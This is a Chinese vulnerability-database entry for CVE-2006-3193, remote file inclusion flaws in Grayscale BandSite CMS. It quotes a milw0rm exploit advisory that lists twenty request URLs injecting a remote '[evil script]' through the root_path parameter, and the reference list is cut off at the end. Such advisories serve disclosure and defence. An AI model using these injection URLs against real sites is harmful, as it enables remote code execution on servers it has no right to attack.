Grayscale BandSite CMS 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110493 漏洞类型 代码注入
发布时间 2006-06-20 更新时间 2006-09-27
CVE编号 CVE-2006-3193 CNNVD-ID CNNVD-200606-459
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/1933
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-459
|漏洞详情
GrayscaleBandSiteCMS1.1.1存在多个PHP远程文件包含漏洞。register_globals启用时,远程攻击者可以借助对(1)includes/content/contact_content.php;包括(2)addbioform.php,(3)addfliersform.php,(4)addgenmerchform.php,(5)addinterviewsform.php,(6)addlinksform.php,(7)addlyricsform.php,(8)addmembioform.php,(9)addmerchform.php,(10)addmerchpicform.php,(11)addnewsform.php,(12)addphotosform.php,(13)addreleaseform.php,(14)addreleasepicform.php,(15)addrelmerchform.php,(16)addreviewsform.php,(17)addshowsform.php,(18)addwearmerchform.php的adminpanel/includes/add_forms/中的多个文件;(19)adminpanel/includes/mailinglist/disphtmltbl.php,以及(20)adminpanel/includes/mailinglist/dispxls.php的root_path参数中的URL,执行任意PHP代码。
|漏洞EXP
---------------------------------------------------------------------------
Grayscale BandSite CMS <=([root_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Grayscale BandSite CMS
version : latest version
URL :http://sourceforge.net/projects/bandsitecms/

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $root_path not sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~

declare variabel $root_path
---------------------------------------------------------------------------

Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-20]
|参考资料

来源:BID
名称:18555
链接:http://www.securityfocus.com/bid/18555
来源:OSVDB
名称:27252
链接:http://www.osvdb.org/27252
来源:OSVDB
名称:27251
链接:http://www.osvdb.org/27251
来源:OSVDB
名称:27250
链接:http://www.osvdb.org/27250
来源:OSVDB
名称:27249
链接:http://www.osvdb.org/27249
来源:OSVDB
名称:27248
链接:http://www.osvdb.org/27248
来源:OSVDB
名称:27247
链接:http://www.osvdb.org/27247
来源:OSVDB
名称:27245
链接:http://www.osvdb.org/27245
来源:OSVDB
名称:27244
链接:http://www.osvdb.org/27244
来源:OSVDB
名称:27243
链接:http://www.osvdb.org/27243
来源:OSVDB
名称:27242
链接:http://www.osvdb.org/27242
来源:OSVDB
名称:27241
链接:http://www.osvdb.org/27241
来源:OSVDB
名称:27240
链接:http://www.osvdb.org/27240
来源:VUPEN
名称:ADV-2006-2462
链接:http://www.frsirt.com/english/advisories/2006/2462
来源:SECUNIA
名称:20768
链接:http://secunia.com/advisories/20768
来源:MILW0RM
名称:1933
链接:http://milw0rm.com/exploits/1933
来源:OSVDB
名称:27246
链接:http://www.osvdb.org/27246
来源:OSVDB
名称:27239
链接:http://www.osvdb.org/27239
来源:OSVDB
名称:27238
链接:http://www.osvdb.org/27238
来源:OSVDB
名称:27237
链接:http:/